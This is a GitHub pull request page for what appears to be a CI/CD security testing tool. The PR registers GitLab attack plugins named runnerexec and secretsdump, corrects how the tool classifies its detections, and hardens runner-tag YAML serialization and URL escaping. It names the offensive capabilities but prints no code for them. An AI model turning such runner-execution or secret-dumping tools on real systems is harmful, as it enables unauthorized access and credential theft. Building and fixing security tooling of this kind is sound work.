Fix GitLab registry, detection classification, and client cleanups#6
Open
praetorian-rang wants to merge 4 commits intomainfrom
Open
Fix GitLab registry, detection classification, and client cleanups#6praetorian-rang wants to merge 4 commits intomainfrom
praetorian-rang wants to merge 4 commits intomainfrom
Conversation
Add blank imports for runnerexec and secretsdump GitLab attack plugins to pkg/attacks/all/all.go. These plugins were only accessible via direct CLI imports, silently omitting them from the global registry used by the SDK integration in pkg/lib/. Resolves LAB-1455
The permissions (token-exposure) and mrsecrets detections both passed VulnExcessivePermissions to GetVulnerabilityClass instead of their actual vulnerability type. This caused findings to be miscategorized in JSON, SARIF, and HTML output. - permissions.go: VulnExcessivePermissions → VulnTokenExposure - mrsecrets.go: VulnExcessivePermissions → VulnMergeRequestSecretsExposure Resolves LAB-1456
- Use yaml.Marshal for runner tag serialization in runnerexec pipeline generation, preventing YAML injection via metacharacters (matches the pattern already used by secretsdump) - Add url.PathEscape to ListUserProjects for consistency with GetProject and ListGroupProjects - Remove duplicate /api/v4 URL normalization from Platform.Init, letting NewClient be the single owner of that logic - Hoist regexp.MustCompile in stripANSICodes to a package-level var to avoid recompilation on every log line Resolves LAB-1460
Verify that runner tags containing YAML-special characters (colon, hash, braces, anchors, aliases) are safely serialized via yaml.Marshal without altering document structure. Resolves LAB-1460
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
1 participant
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Summary
runnerexec,secretsdump) in the global registry so they're discoverable via the SDK path inpkg/lib/token-exposureandmerge-request-secrets-exposuredetections — findings were categorized as "excessive_permissions" instead of "secrets_exposure"yaml.Marshalfor runner tag serialization inrunnerexecto prevent YAML injection via metacharactersurl.PathEscapetoListUserProjectsfor consistency with other client methods/api/v4URL normalization betweenPlatform.InitandNewClientregexp.MustCompilein log parser to a package-level varTesting
make test-short)Closes LAB-1455, LAB-1456, LAB-1460